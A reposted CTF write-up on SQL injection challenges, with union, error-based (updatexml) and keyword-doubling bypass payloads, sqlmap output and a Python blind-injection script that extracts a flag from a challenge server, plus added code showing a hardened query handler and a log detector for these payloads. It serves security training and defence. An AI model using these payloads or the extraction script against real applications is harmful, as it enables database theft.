Summary of common SQL injection challenge types in CTFs

Category: Reverse Engineering

Preface

Body

Case: no filtering, output echoed

Manual injection

4. Extract all table names in the current database

id=-2' union select 1,2,3,(select group_concat(table_name) from information_schema.tables where table_schema=database())#

5. Extract all column names of a given table

id=-2' union select 1,2,3,(select group_concat(column_name) from information_schema.columns where table_name='fl4g')#


SQLmap injection

Execution result

---
Parameter: id (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'ShhA'='ShhA

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id=-2292' UNION ALL SELECT CONCAT(0x716b716b71,0x45784b6e4e78446d737053476e4c4875704c6a58414e444171676264674f634d436c506f554d636b,0x71766a7671),NULL,NULL,NULL-- EKPR
---

3. Get all database names


Universal password

Universal password 2


Case: partial filtering

union bypass type

2. Dump tables

This and every later step need =, but = is filtered, so an equivalent operator has to stand in for it; see my other blog post for the specific bypass.

username=admin' or updatexml/*&password=*/(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where !(table_schema <> database())),0x7e),1) or '1

In this environment, REGEXP can also be used in place of =.

username=admin' or updatexml/*&password=*/(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema REGEXP database()),0x7e),1) or '1

3. Dump columns

username=admin' or updatexml/*&password=*/(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name REGEXP 'ffll44jj'),0x7e),1) or '1

4. Dump contents

username=admin' or updatexml/*&password=*/(1,concat(0x7e,(select value from ffll44jj),0x7e),1) or '1


Summary

Don't panic when you run into SQL injection. Yep.



SQL XOR injection

1. Dump tables:

http://123.206.87.240:9004/1ndex.php

?id=-2' uniounionn selecselectt 1, group_concat(table_name) from infoorrmation_schema.tables where table_schema=database() --+

2. Dump columns

http://123.206.87.240:9004/1ndex.php

?id=-2' uniounionn selecselectt 1, group_concat(column_name) from infoorrmation_schema.columns where table_name='flag1'--+

3. Dump data

http://123.206.87.240:9004/1ndex.php

?id=-2' uniounionn selecselectt 1,flag1 from flag1--+


1. Dump tables

http://123.206.87.240:9004/Once_More.php

?id=1' and updatexml(1,concat('_',(select group_concat(table_name) from information_schema.tables where table_schema=database()),'_'),1) --+

XPATH syntax error: ',flag2_'

2. Dump columns

http://123.206.87.240:9004/Once_More.php

?id=1' and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name='flag2'),'~'),1) --+

XPATH syntax error: '~flag2,address~'

3. Dump contents

http://123.206.87.240:9004/Once_More.php

?id=1' and updatexml(1,concat('~',(select flag2 from flag2),'~'),1) --+

XPATH syntax error: '~flag{Bugku-sql_6s-2i-4t-bug}~'
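The doubled-keyword payloads above get through because the challenge removes each blocked keyword exactly once, and the updatexml payloads leak data because the database engine's error text is returned to the client. The following is an added example (my code, not from the original post or from the Bugku challenge) that reproduces both weaknesses in a small request handler and puts the hardened form beside them. It assumes an in-memory SQLite database as a stand-in for the challenge's MySQL instance: the news and flag1 tables, the placeholder flag value and the blocklist of union, select and or are all constructed for the demonstration.

```python
import logging
import sqlite3

# Constructed stand-in for the challenge's one-pass keyword filter: each blocked
# keyword is removed once, left to right, as a str_replace-style filter does.
BLOCKED_KEYWORDS = ("union", "select", "or")


def naive_filter(value: str) -> str:
    """One-pass blocklist: 'uniounionn' collapses to 'union' after the inner copy is cut out."""
    for keyword in BLOCKED_KEYWORDS:
        value = value.replace(keyword, "")
    return value


def setup_db() -> sqlite3.Connection:
    """Constructed schema: a news table the handler is meant to query, plus a
    stand-in for the challenge's flag table holding a placeholder value."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)", [(1, "first post"), (2, "second post")])
    conn.execute("CREATE TABLE flag1 (flag1 TEXT)")
    conn.execute("INSERT INTO flag1 VALUES ('flag{placeholder}')")
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, raw_id: str) -> dict:
    """The weak pattern: blocklist filter, string-spliced SQL, engine error echoed back."""
    query = "SELECT id, title FROM news WHERE id = '%s'" % naive_filter(raw_id)
    try:
        rows = conn.execute(query).fetchall()
    except sqlite3.Error as exc:
        # This is the behaviour behind the 'XPATH syntax error: ...' lines above:
        # whatever the engine says goes straight to the client.
        return {"ok": False, "error": str(exc)}
    return {"ok": True, "rows": rows}


def hardened_lookup(conn: sqlite3.Connection, raw_id: str) -> dict:
    """Hardened form: the value is bound as a parameter, so it can only ever be
    compared against id, and engine errors are logged server-side, never returned."""
    try:
        row = conn.execute("SELECT id, title FROM news WHERE id = ?", (raw_id,)).fetchone()
    except sqlite3.Error as exc:
        logging.getLogger("app").error("database error for id=%r: %s", raw_id, exc)
        return {"ok": False, "error": "internal error"}
    if row is None:
        return {"ok": False, "error": "not found"}
    return {"ok": True, "rows": [row]}


def main() -> None:
    conn = setup_db()
    payload = "-2' uniounionn selecselectt 1,flag1 from flag1--+"  # the page's doubled-keyword input
    print("after one-pass filter:", naive_filter(payload))
    print("vulnerable handler:", vulnerable_lookup(conn, payload))
    print("vulnerable handler, bad quote:", vulnerable_lookup(conn, "1'"))
    print("hardened handler:", hardened_lookup(conn, payload))
    print("hardened handler, normal id:", hardened_lookup(conn, "2"))


if __name__ == "__main__":
    main()
```

The filter collapse is the whole story behind the bypass: a single replace pass never re-scans the text it has just reassembled, so any blocklist of this kind can be split around itself. The hardened handler does not try to guess a better blocklist; it binds the value, so the engine treats it as data rather than SQL, and it returns only a generic message on error, so nothing like the XPATH text above reaches the client. A further layer for this particular endpoint would be to require id to be an integer before the query is even built.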


SQL blind injection


#!/usr/bin/env python3
# coding:utf-8
# power by jedi
import requests

headers = {
    "POST": "/web/earnest/index.php HTTP/1.1",
    "Host": "ctf5.shiyanbar.com",
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
    "Accept-Encoding": "gzip, deflate"
}
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
# text the page shows only when the injected condition is true
str_right = "You are in"
# candidate characters, tried one at a time for every position
guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/{}?!:@#$&[]._ "


def get_database_name_length():
    print("get_database_name_length start...")
    i = 0
    while True:
        data = {
            'id': "0'oorr(length(database())=%s)oorr'0" % i,
            "submit": "%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2"
        }
        response = requests.post(
            url, data=data, headers=headers, timeout=3).text
        # print(response)
        if str_right in response:
            print("database name length: %s" % i)
            return i
        i += 1


def get_database_name():
    print("get_database_name start...")
    # database_name_length = get_database_name_length()
    database_name_length = 18
    database_name = ""
    for i in range(0, database_name_length):
        i += 1
        for x in guess:
            data = {
                'id': "0'oorr(mid((database())from(%s)foorr(1))='%s')oorr'0" % (i, x),
                "submit": "%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2"
            }
            # print(x)
            try:
                response = requests.post(
                    url, data=data, headers=headers, timeout=3).text
                # print(data)
                if str_right in response:
                    database_name += x
                    print("%s--------%s" % (i, x))
                    break
            except Exception as e:
                print(e)
    print("database name:%s" % database_name)


def get_table_name():
    print("get_table_name start...")
    table_names = ""
    for i in range(30):
        i += 1
        for x in guess:
            data = {
                "id": "0'oorr((select(mid(group_concat(table_name)from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='%s')oorr'0" % (i, x)
            }
            try:
                response = requests.post(
                    url, data=data, headers=headers, timeout=3).text
                # print(data)
                if str_right in response:
                    table_names += x
                    print("%s--------%s" % (i, x))
                    break
            except Exception as e:
                print(e)
    print("table names:%s" % table_names)
    '''
    1--------f
    2--------i
    3--------a
    4--------g
    6--------u
    7--------s
    8--------e
    9--------r
    10--------s
    '''


def get_column_name():
    print("get_column_name")
    column_name = ""
    for i in range(30):
        i += 1
        for x in guess:
            data = {
                "id": "0'oorr((select(mid(group_concat(column_name)from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='%s')oorr'0" % (i, x)
            }
            try:
                response = requests.post(
                    url, data=data, headers=headers, timeout=3).text
                # print(data)
                if str_right in response:
                    column_name += x
                    print("%s--------%s" % (i, x))
                    break
            except Exception as e:
                print(e)
    print("column names:%s" % column_name)
    '''
    1--------f
    2--------l
    3--------$
    4--------4
    5--------g
    '''


def dump_flag():
    print("dump_flag")
    flag = ""
    for i in range(30):
        i += 1
        for x in guess:
            data = {
                "id": "0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='%s')oorr'0" % (i, x)
            }
            # print(data)
            try:
                response = requests.post(url, data=data, headers=headers, timeout=3).text
                if str_right in response:
                    flag += x
                    print("%s-----%s" % (i, x))
                    break
            except Exception as e:
                print(e)
    print("flag:%s" % flag)


def main():
    # get_database_name_length()
    # get_table_name()
    # get_column_name()
    dump_flag()


if __name__ == '__main__':
    main()

 

Summary: with blind SQL injection, first determine the type of blind injection, then work out which keywords are filtered, then bypass those keywords, and finally handle the encoding.
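The sqlmap output earlier on the page and the script above leave a recognisable trace in server logs: a single request carrying SLEEP(5), or a long burst of near-identical requests that differ only in the position probed and the character guessed, with keywords doubled as oorr, foorr or infoorrmation_schema. The following is an added detection example (my code, not from the original post) that scans access-log lines for those signatures and reports per-client counts. The log lines, client addresses, paths and the alert threshold are all constructed; the set of doubled keywords is generated from the same one-pass-strip rule the payloads depend on, so it covers splits the page does not show.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample lines in Apache combined-log style. Addresses come from
# documentation ranges and the query strings are URL-encoded as a server would
# log them; none of this is real traffic.
LOG_LINES = [
    '203.0.113.7 - - [10/Oct/2018:12:00:01 +0800] "GET /1ndex.php?id=2 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2018:12:00:02 +0800] "GET /1ndex.php?id=0%27oorr%28length%28database%28%29%29%3D18%29oorr%270 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2018:12:00:03 +0800] "GET /1ndex.php?id=0%27oorr%28mid%28%28database%28%29%29from%281%29foorr%281%29%29%3D%27a%27%29oorr%270 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2018:12:00:04 +0800] "GET /1ndex.php?id=0%27oorr%28mid%28%28database%28%29%29from%281%29foorr%281%29%29%3D%27b%27%29oorr%270 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2018:12:00:05 +0800] "GET /1ndex.php?id=-2%27+uniounionn+selecselectt+1%2Cflag1+from+flag1--%2B HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [10/Oct/2018:12:01:00 +0800] "GET /1ndex.php?id=1%27+AND+SLEEP%285%29+AND+%27ShhA%27%3D%27ShhA HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [10/Oct/2018:12:01:10 +0800] "GET /search.php?q=sleep+training+tips HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [10/Oct/2018:12:02:00 +0800] "GET /1ndex.php?id=12 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"')
TIME_BASED_RE = re.compile(r"\b(?:sleep|benchmark)\s*\(")          # time-based blind probes
CHAR_PROBE_RE = re.compile(r"\b(?:mid|substr|substring|ascii|ord|length)\s*\(")  # one-character-at-a-time probes
UNION_RE = re.compile(r"\bunion\b.*?\bselect\b")                   # plain union-based extraction

SQL_KEYWORDS = ("or", "and", "union", "select", "from", "where")


def doubled_variants(keyword: str) -> set:
    """Every string that a one-pass strip of `keyword` collapses back into `keyword`:
    the keyword re-inserted into itself at each possible split point."""
    return {keyword[:k] + keyword + keyword[k:] for k in range(len(keyword) + 1)}


DOUBLED = {variant for kw in SQL_KEYWORDS for variant in doubled_variants(kw)}


def classify(target: str) -> list:
    """Indicator names found in one request target, after URL decoding and lowercasing."""
    decoded = unquote_plus(target).lower()
    hits = []
    if TIME_BASED_RE.search(decoded):
        hits.append("time-based")
    if CHAR_PROBE_RE.search(decoded):
        hits.append("char-probe")
    if UNION_RE.search(decoded):
        hits.append("union-select")
    if any(variant in decoded for variant in DOUBLED):
        hits.append("doubled-keyword")
    return hits


def scan_log(lines) -> dict:
    """Per source address: total requests, flagged requests and the indicators seen."""
    summary = defaultdict(lambda: {"total": 0, "flagged": 0, "indicators": set()})
    for line in lines:
        match = LINE_RE.match(line)
        if not match:
            continue  # malformed line, skipped rather than guessed at
        entry = summary[match.group("ip")]
        entry["total"] += 1
        hits = classify(match.group("target"))
        if hits:
            entry["flagged"] += 1
            entry["indicators"].update(hits)
    return dict(summary)


def alerts(lines, min_flagged: int = 3) -> list:
    """Addresses worth a ticket: any time-based probe, or a burst of flagged requests.
    Character-at-a-time extraction needs one request per guess, so it always bursts."""
    flagged = []
    for ip, entry in scan_log(lines).items():
        if entry["flagged"] >= min_flagged or "time-based" in entry["indicators"]:
            flagged.append(ip)
    return sorted(flagged)


def main() -> None:
    for ip, entry in scan_log(LOG_LINES).items():
        print("%-15s total=%d flagged=%d indicators=%s" % (ip, entry["total"], entry["flagged"], sorted(entry["indicators"])))
    print("alerts:", alerts(LOG_LINES))


if __name__ == "__main__":
    main()
```

Two details matter in practice. First, the doubled-keyword check is what catches the union line: a plain \bunion\b regex never fires on uniounionn, because the boundary it wants sits inside the word, so a rule set built only from clean keywords misses exactly the traffic that got past the application's filter. Second, the per-address count is the stronger signal for boolean blind extraction: each individual request looks harmless enough, but the script above issues one request per candidate character per position, which no human browsing session does.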

 

Reposted from: https://blog.csdn.net/huanghelouzi/article/details/82999684




This article first appeared on the WeChat public account (LemonSec): Summary of common SQL injection challenge types in CTFs